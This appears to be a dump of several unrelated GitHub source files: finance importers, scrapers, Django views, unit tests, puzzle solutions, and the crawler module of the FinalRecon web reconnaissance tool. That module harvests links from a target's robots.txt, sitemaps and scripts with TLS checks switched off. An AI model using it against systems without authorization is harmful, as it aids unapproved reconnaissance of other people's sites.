parse\n# from smart_importer import PredictPostings, PredictPayees\n\nclass WechatImporter(importer.ImporterProtocol):\n \"\"\"An importer for Wechat CSV files.\"\"\"\n\n def __init__(self, accountDict: Dict):\n # print(file_type)\n self.accountDict = accountDict\n self.currency = \"CNY\"\n pass\n\n def identify(self, file):\n # Match if the filename is as downloaded and the header has the unique\n # fields combination we're looking for.\n return (re.search(r\"微信支付账单\", path.basename(file.name)))\n\n def file_name(self, file):\n return 'wechat.{}'.format(path.basename(file.name))\n\n def file_account(self, _):\n return \"Assets:WeChat:Wallet\"\n\n def file_date(self, file):\n # Extract the statement date from the filename.\n return datetime.datetime.strptime(path.basename(file.name).split(\"-\")[-1],\n '%Y%m%d).csv').date()\n\n def extract(self, file, existing_entries=None):\n # Open the CSV file and create directives.\n entries = []\n index = 0\n with open(file.name, encoding=\"utf-8\") as f:\n for _ in range(16):\n next(f)\n for index, row in enumerate(csv.DictReader(f)):\n if \"转入零钱通\" in row[\"交易类型\"]:\n continue # skip the transfer to wechat\n\n meta = data.new_metadata(file.name, index)\n date = parse(row['交易时间']).date()\n raw_amount = D(row['金额(元)'].lstrip(\"¥\"))\n isExpense = True if (row['收/支'] == '支出' or row['收/支'] == '/') else False\n if isExpense:\n raw_amount = -raw_amount\n amount = Amount(raw_amount, self.currency)\n payee = row['交易对方']\n narration = row['商品']\n account_1_text = row['支付方式']\n account_1 = 'Assets.FIXME'\n # print(raw_amount,narration,account_1_text,account_2_text)\n for asset_k, asset_v in self.accountDict.items():\n if account_1_text.find(asset_k) != -1:\n # print(asset_k, asset_v)\n account_1 = asset_v\n\n txn = data.Transaction(\n meta, date, self.FLAG, payee, narration, data.EMPTY_SET, data.EMPTY_SET, [\n data.Posting(account_1, amount,\n None, None, None, None),\n ])\n\n entries.append(txn)\n\n # Insert a final balance check.\n\n return entries\n\n\n# @PredictPostings()\n# @PredictPayees()\n# class SmartWechatImporter(WechatImporter):\n# pass\n","repo_name":"heyeshuang/beancount-homemade-importers","sub_path":"importers/wechat.py","file_name":"wechat.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"72"} +{"seq_id":"26048560329","text":"height, width, num_bricks = input().split()\nwidths_list = [int(x) for x in input().split()]\n\nres = 0\nh = 0\nwidth = int(width)\nwhile widths_list:\n res += widths_list.pop(0)\n if res == width:\n h += 1\n if h == int(height):\n print(\"YES\")\n break\n res = 0\n elif res > width:\n print(\"NO\")\n break\n","repo_name":"marbrb/practice-contest","sub_path":"Kattis/Anotherbrick.py","file_name":"Anotherbrick.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2399635146","text":"\n# Import Splinter and BeautifulSoup\nfrom splinter import Browser, browser\nfrom bs4 import BeautifulSoup as soup\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport pandas as pd\nimport datetime as dt\n\n#function to initialize the browser and create a dict\ndef scrape_all():\n #initiate the headless driver for deployment\n #executable_path and browser path\n executable_path = {'executable_path': ChromeDriverManager().install()}\n browser = Browser('chrome', **executable_path, headless=True)\n news_title, news_paragraph = 
mars_news(browser)\n    #url_image, title = hemi(browser)\n    hemisphere_image_urls = hemi(browser)\n    #url_image, title = hemisphere_image_urls\n    \n    # Run all scraping functions and store results in dictionary\n    data = {\n        \"news_title\": news_title,\n        \"news_paragraph\": news_paragraph,\n        \"featured_image\": featured_image(browser),\n        \"facts\": mars_facts(),\n        \"last_modified\": dt.datetime.now(),\n        \"url_hemi\": hemisphere_image_urls,\n        #\"url_image\": url_image,\n        #\"title\" : title\n    }\n    browser.quit()\n    return data\n\ndef mars_news(browser):\n    # Visit the mars nasa news site\n    url = 'https://redplanetscience.com'\n    browser.visit(url)\n    # Optional delay for loading the page\n    browser.is_element_present_by_css('div.list_text', wait_time=1)\n\n\n    # Convert the browser html to a soup object and then quit the browser\n    html = browser.html\n    news_soup = soup(html, 'html.parser')\n    \n    try: \n        slide_elem = news_soup.select_one('div.list_text')\n        ##slide_elem.find('div', class_='content_title')\n        news_title = slide_elem.find('div', class_='content_title').get_text()\n        # Use the parent element to find the paragraph text\n        news_p = slide_elem.find('div', class_='article_teaser_body').get_text()\n    except AttributeError:\n        return None, None\n    # return the title first to match the unpacking in scrape_all\n    return news_title, news_p\n\n\ndef featured_image(browser):\n    # Visit URL\n    url = 'https://spaceimages-mars.com'\n    browser.visit(url)\n\n    # Find and click the full image button\n    full_image_elem = browser.find_by_tag('button')[1]\n    full_image_elem.click()\n\n    # Parse the resulting html with soup\n    html = browser.html\n    img_soup = soup(html, 'html.parser')\n\n    try:\n        # Find the relative image url\n        img_url_rel = img_soup.find('img', class_='headerimage fade-in').get('src')\n    except AttributeError:\n        return None\n\n\n    # Use the base URL to create an absolute URL\n    img_url = f'https://spaceimages-mars.com/{img_url_rel}'\n    return img_url\n\ndef mars_facts():\n    # export the scraped table to a dataframe\n    try:\n        df = pd.read_html('https://galaxyfacts-mars.com')[0]\n    except BaseException:\n        return None\n    df.columns=['description', 'Mars', 'Earth']\n    df.set_index('description', inplace=True)\n    return df.to_html(classes=\"table table-hover\")\n    \n\ndef hemi(browser):\n    # 1. Use browser to visit the URL \n    url = 'https://marshemispheres.com/'\n    browser.visit(url)\n    browser.is_element_present_by_css('div.list_text', wait_time=1)\n    # Parse the resulting html with soup\n    html = browser.html\n    img_soup = soup(html, 'html.parser')\n    # 2. Create a list to hold the images and titles.\n    hemisphere_image_urls = []\n# 3. 
Write code to retrieve the image urls and titles for each hemisphere.\n for image in img_soup.find_all('div', class_='item'):\n hemispheres = {}\n if image.find('a', class_='itemLink product-item'):\n image_link = image.find(href=True).get('href')\n link = url+image_link\n browser.visit(link)\n enhan_img_soup = soup(browser.html, 'html.parser')\n full_image_elem = enhan_img_soup.find('img', class_='wide-image').get('src')\n img_url = url+full_image_elem\n hemispheres.update({'url_image': img_url})\n hemi_title = image.find('h3').text\n hemispheres.update({'title': hemi_title})\n hemisphere_image_urls.append(hemispheres)\n #print(hemispheres)\n #return(hemispheres)\n return hemisphere_image_urls \n # return hemispheres\n \n\nif __name__ == \"__main__\":\n #if running as script, print scraped data\n print(scrape_all())\n #print(hemi(browser))\n\n","repo_name":"airplane3333/Mission-to-Mars","sub_path":"scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18128492859","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_POST\nfrom shop.models import Product\nfrom .cesta import Cesta\nfrom .forms import CestaAddProductForm\nfrom django.shortcuts import render, redirect\n\n@require_POST\ndef cesta_add(request, product_id):\n cesta = Cesta(request)\n product = get_object_or_404(Product, id=product_id)\n form = CestaAddProductForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n cesta.add(product=product,\n quantity=cd['quantity'],\n override_quantity=cd['override'])\n return redirect('cesta:cesta_detail')\n\n@require_POST\ndef cesta_remove(request, product_id):\n cesta = Cesta(request)\n product = get_object_or_404(Product, id=product_id)\n cesta.remove(product)\n return redirect('cesta:cesta_detail')\n\ndef cesta_detail(request):\n cesta = Cesta(request)\n for item in cesta:\n item['update_quantity_form'] = CestaAddProductForm(initial={\n 'quantity': item['quantity'],\n 'override': True})\n return render(request, 'cesta/detail.html', {'cesta': cesta})\n\n","repo_name":"Miguel-Angel-Roldan-Garcia/PGPI-3.11-Motosaurio","sub_path":"motosaurio/cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"23252380735","text":"# -*- coding: utf-8 -*-\n\n################################################\n#\n# URL:\n# =====\n# https://leetcode.com/problems/minimum-size-subarray-sum/\n#\n# DESC:\n# =====\n# Given an array of n positive integers and a positive integer s,\n# find the minimal length of a contiguous subarray of which the sum ≥ s.\n# If there isn't one, return 0 instead.\n#\n# Example:\n# Input: s = 7, nums = [2,3,1,2,4,3]\n# Output: 2\n# Explanation: the subarray [4,3] has the minimal length under the problem constraint.\n#\n# Follow up:\n# If you have figured out the O(n) solution,\n# try coding another solution of which the time complexity is O(n log n).\n################################################\nfrom typing import List\n\n\nclass Solution:\n def minSubArrayLen(self, s: int, nums: List[int]) -> int:\n start = 0\n sum = 0\n minLen = len(nums) + 1\n\n for i in range(len(nums)):\n sum += nums[i]\n while sum - nums[start] >= s:\n sum -= nums[start]\n start += 1\n if sum >= s:\n minLen = min(minLen, i - start + 1)\n\n return minLen if minLen <= 
len(nums) else 0\n","repo_name":"huajianmao/pyleet","sub_path":"solutions/a0209minimumsizesubarraysum.py","file_name":"a0209minimumsizesubarraysum.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"68994939","text":"\"\"\"\nRestore time computing tests\n\"\"\"\nimport pytest\nfrom datetime import datetime, timedelta\nfrom dbaas_internal_api.utils.types import (\n Backup,\n ClusterBackup,\n DTYPE_LOCAL_SSD,\n DTYPE_NETWORK_HDD,\n DTYPE_NETWORK_SSD,\n DTYPE_NRD,\n ExistedHostResources,\n GIGABYTE,\n MEGABYTE,\n TERABYTE,\n VTYPE_COMPUTE,\n VTYPE_PORTO,\n)\nfrom dbaas_internal_api.utils.time import compute_restore_time_limit_2\n\n# pylint: disable=missing-docstring, invalid-name\n\n\ndef getDefaultFlavor():\n return {\n 'io_limit': 400 * MEGABYTE,\n 'vtype': VTYPE_PORTO,\n 'network_limit': 400 * MEGABYTE,\n 'cpu_guarantee': 2,\n 'cpu_fraction': 100,\n }\n\n\ndef getDefaultHostResources() -> ExistedHostResources:\n return ExistedHostResources(disk_size=48 * GIGABYTE, disk_type_id=DTYPE_LOCAL_SSD)\n\n\nclass Tests_restore_time_computing:\n def test_time_earlier_Backup_start_fails(self):\n with pytest.raises(RuntimeError):\n flavor = getDefaultFlavor()\n backup = Backup(\"some_id\", datetime(2021, 1, 1, 12, 00), datetime(2021, 1, 1, 12, 30))\n\n compute_restore_time_limit_2(\n dest_flavor=flavor,\n backup=backup,\n time=datetime(2021, 1, 1, 11),\n src_resources=getDefaultHostResources(),\n dest_resources=getDefaultHostResources(),\n )\n\n def test_backup_uses_disk_size(self):\n flavor = getDefaultFlavor()\n backup = Backup(\"some_id\", datetime(2021, 1, 1, 12, 00), datetime(2021, 1, 1, 12, 30))\n\n result = compute_restore_time_limit_2(\n dest_flavor=flavor,\n backup=backup,\n time=datetime(2021, 1, 1, 13),\n src_resources=getDefaultHostResources(),\n dest_resources=getDefaultHostResources(),\n )\n assert result == timedelta(seconds=11352, microseconds=960000)\n\n def test_use_disk_size_when_uncompressed_unknown(self):\n flavor = getDefaultFlavor()\n backup = ClusterBackup(\"some_id\", datetime(2021, 1, 1, 12, 00), datetime(2021, 1, 1, 12, 30))\n\n result = compute_restore_time_limit_2(\n dest_flavor=flavor,\n backup=backup,\n time=datetime(2021, 1, 1, 13),\n src_resources=getDefaultHostResources(),\n dest_resources=getDefaultHostResources(),\n )\n assert result == timedelta(seconds=11352, microseconds=960000)\n\n def test_use_uncompressed_size(self):\n flavor = getDefaultFlavor()\n backup = ClusterBackup(\n \"some_id\", datetime(2021, 1, 1, 12, 00), datetime(2021, 1, 1, 12, 30), uncompressed_size=100 * GIGABYTE\n )\n\n result = compute_restore_time_limit_2(\n dest_flavor=flavor,\n backup=backup,\n time=datetime(2021, 1, 1, 13),\n src_resources=getDefaultHostResources(),\n dest_resources=getDefaultHostResources(),\n )\n assert result == timedelta(seconds=11952)\n\n def test_use_network_limit(self):\n flavor = getDefaultFlavor()\n flavor['network_limit'] = 10 * MEGABYTE\n backup = ClusterBackup(\n \"some_id\",\n datetime(2021, 1, 1, 12, 00),\n datetime(2021, 1, 1, 12, 30),\n size=30 * GIGABYTE,\n uncompressed_size=100 * GIGABYTE,\n )\n\n result = compute_restore_time_limit_2(\n dest_flavor=flavor,\n backup=backup,\n time=datetime(2021, 1, 1, 13),\n src_resources=getDefaultHostResources(),\n dest_resources=getDefaultHostResources(),\n )\n assert result == timedelta(seconds=24624)\n\n def test_use_software_io_limit(self):\n flavor = getDefaultFlavor()\n flavor['vtype'] = VTYPE_COMPUTE\n backup = 
ClusterBackup(\n \"some_id\",\n datetime(2021, 1, 1, 12, 00),\n datetime(2021, 1, 1, 12, 30),\n size=30 * GIGABYTE,\n uncompressed_size=100 * GIGABYTE,\n )\n dest_resources = ExistedHostResources(disk_size=2 * TERABYTE, disk_type_id=DTYPE_NETWORK_SSD)\n\n result = compute_restore_time_limit_2(\n dest_flavor=flavor,\n backup=backup,\n time=datetime(2021, 1, 1, 13),\n src_resources=getDefaultHostResources(),\n dest_resources=dest_resources,\n software_io_limit=65 * MEGABYTE,\n )\n assert result == timedelta(seconds=17889, microseconds=230766)\n\n @pytest.mark.parametrize(\n ['disk_size', 'disk_type', 'expected_timedelta'],\n [\n (100 * GIGABYTE, DTYPE_NETWORK_HDD, timedelta(seconds=26160)),\n (100 * GIGABYTE, DTYPE_NETWORK_SSD, timedelta(seconds=18480)),\n # 500 < 400 test network limit, use network limit\n (100 * GIGABYTE, DTYPE_LOCAL_SSD, timedelta(seconds=11721, microseconds=600000)),\n (100 * GIGABYTE, DTYPE_NRD, timedelta(seconds=13609, microseconds=756098)),\n # after disk size 450MB/15MB * 32GB we should use disk limit of 450MB/s for network ssd\n (2 * TERABYTE, DTYPE_NETWORK_SSD, timedelta(seconds=11824, microseconds=2)),\n (3 * TERABYTE, DTYPE_NETWORK_SSD, timedelta(seconds=11824, microseconds=2)),\n ],\n )\n def test_use_formula(self, disk_size, disk_type, expected_timedelta):\n flavor = getDefaultFlavor()\n flavor['vtype'] = VTYPE_COMPUTE\n backup = ClusterBackup(\n \"some_id\",\n datetime(2021, 1, 1, 12, 00),\n datetime(2021, 1, 1, 12, 30),\n size=30 * GIGABYTE,\n uncompressed_size=100 * GIGABYTE,\n )\n dest_resources = ExistedHostResources(disk_size=disk_size, disk_type_id=disk_type)\n\n result = compute_restore_time_limit_2(\n dest_flavor=flavor,\n backup=backup,\n time=datetime(2021, 1, 1, 13),\n src_resources=getDefaultHostResources(),\n dest_resources=dest_resources,\n )\n assert result == expected_timedelta\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"cloud/tests/modules/mysql/test_restore_time_computing.py","file_name":"test_restore_time_computing.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1194609298","text":"#!/usr/bin/env python3\n\nimport re\nimport bs4\nimport lxml\nimport json\nimport asyncio\nimport requests\nimport threading\nimport tldextract\nfrom datetime import date\nfrom modules.export import export\nrequests.packages.urllib3.disable_warnings()\n\nR = '\\033[31m' # red\nG = '\\033[32m' # green\nC = '\\033[36m' # cyan\nW = '\\033[0m' # white\nY = '\\033[33m' # yellow\n\nuser_agent = {'User-Agent': 'FinalRecon'}\n\nsoup = ''\ntotal = []\nr_total = []\nsm_total = []\njs_total = []\ncss_total = []\nint_total = []\next_total = []\nimg_total = []\njs_crawl_total = []\nsm_crawl_total = []\n\n\ndef crawler(target, output, data):\n\tglobal soup, r_url, sm_url\n\tprint(f'\\n{Y}[!] 
Starting Crawler...{W}\n')\n\n\ttry:\n\t\trqst = requests.get(target, headers=user_agent, verify=False, timeout=10)\n\texcept Exception as e:\n\t\tprint(f'{R} [-] Exception : {C}{e}{W}')\n\t\treturn\n\n\tsc = rqst.status_code\n\tif sc == 200:\n\t\tpage = rqst.content\n\t\tsoup = bs4.BeautifulSoup(page, 'lxml')\n\n\t\tprotocol = target.split('://')\n\t\tprotocol = protocol[0]\n\t\ttemp_tgt = target.split('://')[1]\n\t\tpattern = r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d{2,5}'\n\t\tcustom = bool(re.match(pattern, temp_tgt))\n\t\tif custom is True:\n\t\t\tr_url = f'{protocol}://{temp_tgt}/robots.txt'\n\t\t\tsm_url = f'{protocol}://{temp_tgt}/sitemap.xml'\n\t\t\tbase_url = f'{protocol}://{temp_tgt}'\n\t\telse:\n\t\t\text = tldextract.extract(target)\n\t\t\thostname = '.'.join(part for part in ext if part)\n\t\t\tbase_url = f'{protocol}://{hostname}'\n\t\t\tr_url = f'{base_url}/robots.txt'\n\t\t\tsm_url = f'{base_url}/sitemap.xml'\n\n\t\tloop = asyncio.new_event_loop()\n\t\tasyncio.set_event_loop(loop)\n\t\ttasks = asyncio.gather(\n\t\t\trobots(r_url, base_url, data, output),\n\t\t\tsitemap(sm_url, data, output),\n\t\t\tcss(target, data, output),\n\t\t\tjs(target, data, output),\n\t\t\tinternal_links(target, data, output),\n\t\t\texternal_links(target, data, output),\n\t\t\timages(target, data, output),\n\t\t\tsm_crawl(data, output),\n\t\t\tjs_crawl(data, output))\n\t\tloop.run_until_complete(tasks)\n\t\tloop.close()\n\t\tstats(output, data)\n\telse:\n\t\tprint(f'{R}[-] {C}Status : {W}{sc}')\n\n\ndef url_filter(target, link):\n\tif all([link.startswith('/') is True, link.startswith('//') is False]):\n\t\tret_url = target + link\n\t\treturn ret_url\n\telse:\n\t\tpass\n\n\tif link.startswith('//') is True:\n\t\tret_url = link.replace('//', 'http://')\n\t\treturn ret_url\n\telse:\n\t\tpass\n\n\tif all([\n\t\tlink.find('//') == -1,\n\t\tlink.find('../') == -1,\n\t\tlink.find('./') == -1,\n\t\tlink.find('http://') == -1,\n\t\tlink.find('https://') == -1]\n\t):\n\t\tret_url = f'{target}/{link}'\n\t\treturn ret_url\n\telse:\n\t\tpass\n\n\tif all([\n\t\tlink.find('http://') == -1,\n\t\tlink.find('https://') == -1]\n\t):\n\t\t# chain the replacements on ret_url so each fix keeps the previous one\n\t\tret_url = link.replace('//', 'http://')\n\t\tret_url = ret_url.replace('../', f'{target}/')\n\t\tret_url = ret_url.replace('./', f'{target}/')\n\t\treturn ret_url\n\telse:\n\t\tpass\n\treturn link\n\nasync def robots(robo_url, base_url, data, output):\n\tglobal r_total\n\tprint(f'{G}[+] {C}Looking for robots.txt{W}', end='', flush=True)\n\n\ttry:\n\t\tr_rqst = requests.get(robo_url, headers=user_agent, verify=False, timeout=10)\n\t\tr_sc = r_rqst.status_code\n\t\tif r_sc == 200:\n\t\t\tprint(G + '['.rjust(9, '.') + ' Found ]' + W)\n\t\t\tprint(f'{G}[+] {C}Extracting robots Links{W}', end='', flush=True)\n\t\t\tr_page = r_rqst.text\n\t\t\tr_scrape = r_page.split('\\n')\n\t\t\tfor entry in r_scrape:\n\t\t\t\tif any([\n\t\t\t\t\tentry.find('Disallow') == 0,\n\t\t\t\t\tentry.find('Allow') == 0,\n\t\t\t\t\tentry.find('Sitemap') == 0]):\n\n\t\t\t\t\turl = entry.split(': ')\n\t\t\t\t\ttry:\n\t\t\t\t\t\turl = url[1]\n\t\t\t\t\t\turl = url.strip()\n\t\t\t\t\t\ttmp_url = url_filter(base_url, url)\n\t\t\t\t\t\tif tmp_url is not None:\n\t\t\t\t\t\t\tr_total.append(url_filter(base_url, url))\n\t\t\t\t\t\tif url.endswith('xml') is True:\n\t\t\t\t\t\t\tsm_total.append(url)\n\t\t\t\t\texcept Exception:\n\t\t\t\t\t\tpass\n\n\t\t\tr_total = set(r_total)\n\t\t\tprint(G + '['.rjust(8, '.') + ' {} ]'.format(str(len(r_total))))\n\t\t\texporter(data, output, r_total, 'robots')\n\t\telif r_sc == 
404:\n\t\t\tprint(R + '['.rjust(9, '.') + ' Not Found ]' + W)\n\t\telse:\n\t\t\tprint(R + '['.rjust(9, '.') + ' {} ]'.format(r_sc) + W)\n\texcept Exception as e:\n\t\tprint(f'\\n{R}[-] Exception : {C}{e}{W}')\n\n\nasync def sitemap(sm_url, data, output):\n\tglobal sm_total\n\tprint(f'{G}[+] {C}Looking for sitemap.xml{W}', end='', flush=True)\n\ttry:\n\t\tsm_rqst = requests.get(sm_url, headers=user_agent, verify=False, timeout=10)\n\t\tsm_sc = sm_rqst.status_code\n\t\tif sm_sc == 200:\n\t\t\tprint(G + '['.rjust(8, '.') + ' Found ]' + W)\n\t\t\tprint(f'{G}[+] {C}Extracting sitemap Links{W}', end='', flush=True)\n\t\t\tsm_page = sm_rqst.content\n\t\t\tsm_soup = bs4.BeautifulSoup(sm_page, 'xml')\n\t\t\tlinks = sm_soup.find_all('loc')\n\t\t\tfor url in links:\n\t\t\t\turl = url.get_text()\n\t\t\t\tif url is not None:\n\t\t\t\t\tsm_total.append(url)\n\n\t\t\tsm_total = set(sm_total)\n\t\t\tprint(G + '['.rjust(7, '.') + ' {} ]'.format(str(len(sm_total))))\n\t\t\texporter(data, output, sm_total, 'sitemap')\n\t\telif sm_sc == 404:\n\t\t\tprint(R + '['.rjust(8, '.') + ' Not Found ]' + W)\n\t\telse:\n\t\t\tprint(f'{R}{\"[\".rjust(8, \".\")} Status Code : {sm_sc} ]{W}')\n\texcept Exception as e:\n\t\tprint(f'\\n{R}[-] Exception : {C}{e}{W}')\n\n\nasync def css(target, data, output):\n\tglobal css_total\n\tprint(f'{G}[+] {C}Extracting CSS Links{W}', end='', flush=True)\n\tcss = soup.find_all('link', href=True)\n\n\tfor link in css:\n\t\turl = link.get('href')\n\t\tif url is not None and '.css' in url:\n\t\t\tcss_total.append(url_filter(target, url))\n\n\tcss_total = set(css_total)\n\tprint(G + '['.rjust(11, '.') + ' {} ]'.format(str(len(css_total))) + W)\n\texporter(data, output, css_total, 'css')\n\n\nasync def js(target, data, output):\n\tglobal total, js_total\n\tprint(f'{G}[+] {C}Extracting Javascript Links{W}', end='', flush=True)\n\tscr_tags = soup.find_all('script', src=True)\n\n\tfor link in scr_tags:\n\t\turl = link.get('src')\n\t\tif url is not None and '.js' in url:\n\t\t\ttmp_url = url_filter(target, url)\n\t\t\tif tmp_url is not None:\n\t\t\t\tjs_total.append(tmp_url)\n\n\tjs_total = set(js_total)\n\tprint(G + '['.rjust(4, '.') + ' {} ]'.format(str(len(js_total))))\n\texporter(data, output, js_total, 'javascripts')\n\n\nasync def internal_links(target, data, output):\n\tglobal total, int_total\n\tprint(f'{G}[+] {C}Extracting Internal Links{W}', end='', flush=True)\n\n\text = tldextract.extract(target)\n\tdomain = ext.registered_domain\n\n\tlinks = soup.find_all('a')\n\tfor link in links:\n\t\turl = link.get('href')\n\t\tif url is not None:\n\t\t\tif domain in url:\n\t\t\t\tint_total.append(url)\n\n\tint_total = set(int_total)\n\tprint(G + '['.rjust(6, '.') + ' {} ]'.format(str(len(int_total))))\n\texporter(data, output, int_total, 'internal_urls')\n\n\nasync def external_links(target, data, output):\n\tglobal total, ext_total\n\tprint(f'{G}[+] {C}Extracting External Links{W}', end='', flush=True)\n\n\text = tldextract.extract(target)\n\tdomain = ext.registered_domain\n\n\tlinks = soup.find_all('a')\n\tfor link in links:\n\t\turl = link.get('href')\n\t\tif url is not None:\n\t\t\tif domain not in url and 'http' in url:\n\t\t\t\text_total.append(url)\n\n\text_total = set(ext_total)\n\tprint(G + '['.rjust(6, '.') + ' {} ]'.format(str(len(ext_total))))\n\texporter(data, output, ext_total, 'external_urls')\n\n\nasync def images(target, data, output):\n\tglobal total, img_total\n\tprint(f'{G}[+] {C}Extracting Images{W}', end='', flush=True)\n\timage_tags = soup.find_all('img')\n\n\tfor link in 
image_tags:\n\t\turl = link.get('src')\n\t\tif url is not None and len(url) > 1:\n\t\t\timg_total.append(url_filter(target, url))\n\n\timg_total = set(img_total)\n\tprint(G + '['.rjust(14, '.') + ' {} ]'.format(str(len(img_total))))\n\texporter(data, output, img_total, 'images')\n\n\nasync def sm_crawl(data, output):\n\tglobal sm_crawl_total\n\tprint(f'{G}[+] {C}Crawling Sitemaps{W}', end='', flush=True)\n\n\tthreads = []\n\n\tdef fetch(site_url):\n\t\ttry:\n\t\t\tsm_rqst = requests.get(site_url, headers=user_agent, verify=False, timeout=10)\n\t\t\tsm_sc = sm_rqst.status_code\n\t\t\tif sm_sc == 200:\n\t\t\t\tsm_data = sm_rqst.content.decode()\n\t\t\t\tsm_soup = bs4.BeautifulSoup(sm_data, 'xml')\n\t\t\t\tlinks = sm_soup.find_all('loc')\n\t\t\t\tfor url in links:\n\t\t\t\t\turl = url.get_text()\n\t\t\t\t\tif url is not None:\n\t\t\t\t\t\tsm_crawl_total.append(url)\n\t\t\telif sm_sc == 404:\n\t\t\t\t# print(R + '['.rjust(8, '.') + ' Not Found ]' + W)\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\t# print(R + '['.rjust(8, '.') + ' {} ]'.format(sm_sc) + W)\n\t\t\t\tpass\n\t\texcept Exception:\n\t\t\t# print(f'\\n{R}[-] Exception : {C}{e}{W}')\n\t\t\tpass\n\n\tfor site_url in sm_total:\n\t\tif site_url != sm_url:\n\t\t\tif site_url.endswith('xml') is True:\n\t\t\t\tt = threading.Thread(target=fetch, args=[site_url])\n\t\t\t\tt.daemon = True\n\t\t\t\tthreads.append(t)\n\t\t\t\tt.start()\n\n\tfor thread in threads:\n\t\tthread.join()\n\n\tsm_crawl_total = set(sm_crawl_total)\n\tprint(G + '['.rjust(14, '.') + ' {} ]'.format(str(len(sm_crawl_total))))\n\texporter(data, output, sm_crawl_total, 'urls_inside_sitemap')\n\n\nasync def js_crawl(data, output):\n\tglobal js_crawl_total\n\tprint(f'{G}[+] {C}Crawling Javascripts{W}', end='', flush=True)\n\n\tthreads = []\n\n\tdef fetch(js_url):\n\t\ttry:\n\t\t\tjs_rqst = requests.get(js_url, headers=user_agent, verify=False, timeout=10)\n\t\t\tjs_sc = js_rqst.status_code\n\t\t\tif js_sc == 200:\n\t\t\t\tjs_data = js_rqst.content.decode()\n\t\t\t\tjs_data = js_data.split(';')\n\t\t\t\tfor line in js_data:\n\t\t\t\t\tif any(['http://' in line, 'https://' in line]):\n\t\t\t\t\t\tfound = re.findall(r'\\\"(http[s]?://.*?)\\\"', line)\n\t\t\t\t\t\tfor item in found:\n\t\t\t\t\t\t\tif len(item) > 8:\n\t\t\t\t\t\t\t\tjs_crawl_total.append(item)\n\t\texcept Exception as e:\n\t\t\tprint(f'\\n{R}[-] Exception : {C}{e}{W}')\n\n\tfor js_url in js_total:\n\t\tt = threading.Thread(target=fetch, args=[js_url])\n\t\tt.daemon = True\n\t\tthreads.append(t)\n\t\tt.start()\n\n\tfor thread in threads:\n\t\tthread.join()\n\n\tjs_crawl_total = set(js_crawl_total)\n\tprint(G + '['.rjust(11, '.') + ' {} ]'.format(str(len(js_crawl_total))))\n\texporter(data, output, js_crawl_total, 'urls_inside_js')\n\n\ndef exporter(data, output, list_name, file_name):\n\tdata[f'module-crawler-{file_name}'] = ({'links': list(list_name)})\n\tdata[f'module-crawler-{file_name}'].update({'exported': False})\n\tfname = f'{output[\"directory\"]}/{file_name}.{output[\"format\"]}'\n\toutput['file'] = fname\n\texport(output, data)\n\n\ndef stats(output, data):\n\tglobal total\n\n\ttotal.extend(r_total)\n\ttotal.extend(sm_total)\n\ttotal.extend(css_total)\n\ttotal.extend(js_total)\n\ttotal.extend(js_crawl_total)\n\ttotal.extend(sm_crawl_total)\n\ttotal.extend(int_total)\n\ttotal.extend(ext_total)\n\ttotal.extend(img_total)\n\ttotal = set(total)\n\n\tprint(f'\\n{G}[+] {C}Total Unique Links Extracted : {W}{len(total)}')\n\n\tif output != 'None':\n\t\tif len(total) != 0:\n\t\t\tdata['module-crawler-stats'] = {'Total Unique 
Links Extracted': str(len(total))}\n\t\t\ttry:\n\t\t\t\ttarget_title = soup.title.string\n\t\t\texcept AttributeError:\n\t\t\t\ttarget_title = 'None'\n\t\t\tdata['module-crawler-stats'].update({'Title ': str(target_title)})\n\n\t\t\tdata['module-crawler-stats'].update(\n\t\t\t\t{\n\t\t\t\t\t'total_urls_robots': len(r_total),\n\t\t\t\t\t'total_urls_sitemap': len(sm_total),\n\t\t\t\t\t'total_urls_css': len(css_total),\n\t\t\t\t\t'total_urls_js': len(js_total),\n\t\t\t\t\t'total_urls_in_js': len(js_crawl_total),\n\t\t\t\t\t'total_urls_in_sitemaps': len(sm_crawl_total),\n\t\t\t\t\t'total_urls_internal': len(int_total),\n\t\t\t\t\t'total_urls_external': len(ext_total),\n\t\t\t\t\t'total_urls_images': len(img_total),\n\t\t\t\t\t'total_urls': len(total)\n\t\t\t\t})\n\t\t\tdata['module-crawler-stats'].update({'exported': False})\n","repo_name":"thewhiteh4t/FinalRecon","sub_path":"modules/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":11025,"program_lang":"python","lang":"en","doc_type":"code","stars":1942,"dataset":"github-code","pt":"72"} +{"seq_id":"37503702234","text":"import arcade\nimport settings\nimport random\nfrom typing import List\n\ntotal_points = str(0)\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nSCREEN_TITLE = \"MATCH OFF\"\n\n# game states\nCUT_SCREEN = 0\nMENU = 1\nINSTRUCTIONS = 2\nGAME_RUNNING = 3\nLEADERBOARD = 4\n\n\ndef calc_points(shapes: int) -> int:\n '''takes cleared shapes and calculates the point value\n Args:\n shapes = amount of shapes cleared\n Returns:\n point score\n '''\n if shapes == 1:\n return 10\n\n return 10 + calc_points(shapes - 1)\n\n\nclass Slide:\n '''creates slides\n Attributes:\n slide_name(str) = name of the slide\n '''\n\n def __init__(self, slide_name: str):\n '''creates a sldie object\n Args:\n slide_name: name of slide\n '''\n self._slide_name = slide_name\n\n def get_slide_name(self):\n '''gets the name of the slide\n Returns:\n Name of the slide\n '''\n return self._slide_name\n\n def set_slide_name(self, value: 